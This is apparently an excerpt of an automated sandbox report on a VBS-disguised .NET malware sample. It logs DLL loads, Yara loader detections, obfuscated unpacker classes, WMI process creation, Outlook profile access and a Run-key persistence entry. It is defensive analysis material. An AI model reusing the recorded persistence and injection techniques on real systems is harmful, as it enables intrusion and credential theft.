Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1624988999.0000000009220000.00000004.08000000.00040000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005A7E000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.0000000006465000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000067CB000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004BBF000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.00000000057D5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1624988999.0000000009220000.00000004.08000000.00040000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.0000000005A7E000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.0000000006465000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1890962088.00000000067CB000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.0000000005A2C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004BBF000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1916609036.00000000057D5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: DOCUMENTS.vbs.exe, 00000004.00000000.1419779727.0000000000111000.00000020.00000001.01000000.00000005.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000000.1712110683.0000000000FA8000.00000020.00000001.01000000.00000008.sdmp, Nwjbuywyew.vbs.exe.11.dr, DOCUMENTS.vbs.exe.2.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: DOCUMENTS.vbs.exe, 00000004.00000000.1419779727.0000000000111000.00000020.00000001.01000000.00000005.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000000.1712110683.0000000000FA8000.00000020.00000001.01000000.00000008.sdmp, Nwjbuywyew.vbs.exe.11.dr, DOCUMENTS.vbs.exe.2.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.DOCUMENTS.vbs.exe.8e20000.7.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 4.2.DOCUMENTS.vbs.exe.8e20000.7.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 4.2.DOCUMENTS.vbs.exe.8e20000.7.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 4.2.DOCUMENTS.vbs.exe.8e20000.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 4.2.DOCUMENTS.vbs.exe.8e20000.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 4.2.DOCUMENTS.vbs.exe.9220000.9.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 4.2.DOCUMENTS.vbs.exe.5d510e0.2.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 4.2.DOCUMENTS.vbs.exe.5d510e0.2.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 4.2.DOCUMENTS.vbs.exe.5d510e0.2.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 4.2.DOCUMENTS.vbs.exe.5d510e0.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 4.2.DOCUMENTS.vbs.exe.5d510e0.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 13.2.Nwjbuywyew.vbs.exe.64657e8.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.59a5788.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.Nwjbuywyew.vbs.exe.66353e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DOCUMENTS.vbs.exe.8e80000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Nwjbuywyew.vbs.exe.584c3c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1826048425.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1623969561.0000000008E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1570905081.0000000004D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1873959182.0000000004A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DOCUMENTS.vbs.exe PID: 7804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276, type: MEMORYSTR

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_04951CB3 pushad ; retf	4_2_04951CC2
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_04951CA3 pushad ; retf	4_2_04951CB2
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_07475D78 pushfd ; ret	4_2_07475D79
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_07475D1A pushfd ; ret	4_2_07475D1B
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_07475DD2 pushfd ; ret	4_2_07475DD3
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_07476291 push FFFFFF97h; ret	4_2_07476293
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E79829 push B8FFFFD6h; ret	4_2_08E7982E
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08E7AB31 push edi; ret	4_2_08E7AB32
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F0BB50 pushad ; retf	4_2_08F0BB51
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1B068 push esp; iretd	4_2_08F1B069
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F19D98 pushad ; ret	4_2_08F19D99
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Code function: 4_2_08F1FD4E push FFFFFFE9h; retf	4_2_08F1FD50
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_05248128 push ecx; retf 0007h	13_2_05248132
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_052480F7 push ecx; retf 0007h	13_2_05248102
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_05245578 pushfd ; ret	13_2_05245591
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_075E67D4 push FFFFFF8Bh; iretd	13_2_075E67D7
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_075E6659 push FFFFFF8Bh; ret	13_2_075E665E
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_075E6696 push FFFFFF8Bh; ret	13_2_075E6698
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_075E0C50 push 780986CBh; retf	13_2_075E0D95
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974DB7C push esp; iretd	13_2_0974DB7D
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974DBC0 pushad ; iretd	13_2_0974DBCD
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974BA7D push eax; iretd	13_2_0974BA7E
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0974A468 pushad ; retf	13_2_0974A469
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09779829 push B8FFFFD6h; ret	13_2_0977982E
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_0977AB31 push edi; ret	13_2_0977AB32
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09966EE8 push ss; iretd	13_2_09966EE9
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Code function: 13_2_09B8268C push E8000001h; retf	13_2_09B82691

Source: 4.2.DOCUMENTS.vbs.exe.8d30000.6.raw.unpack, j5yU0LOfMQGAdQvxaVI.cs	High entropy of concatenated method names: 'qXrOxZ7ao3', 'vJ4ZGs5qSHFYgDbeZFL', 'BageW95AUTHkcCBtfyH', 'sJ0h6Y5XPv4Bl3wJ5Lc', 'IshYlW5I5vKlTiJqdYy', 'Jb65H15TsQgHMhhQR6b', 'yL47k35xdt1EtApLeKm'
Source: 4.2.DOCUMENTS.vbs.exe.8d30000.6.raw.unpack, oTBgkZOF4TI2IoOmA1T.cs	High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'G1UONxFZ7I', 'NtProtectVirtualMemory', 'iG6e5N5BeloC7suJB4v', 'tRnnB15DjGZYCAGuuD2', 'GVcpYH5uX3ePsUpLL2m', 'N9q4Nr5ax3NdBWNrroN'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe			Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe			Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nwjbuywyew C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs

Jump to behavior

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nwjbuywyew			Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nwjbuywyew			Jump to behavior

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
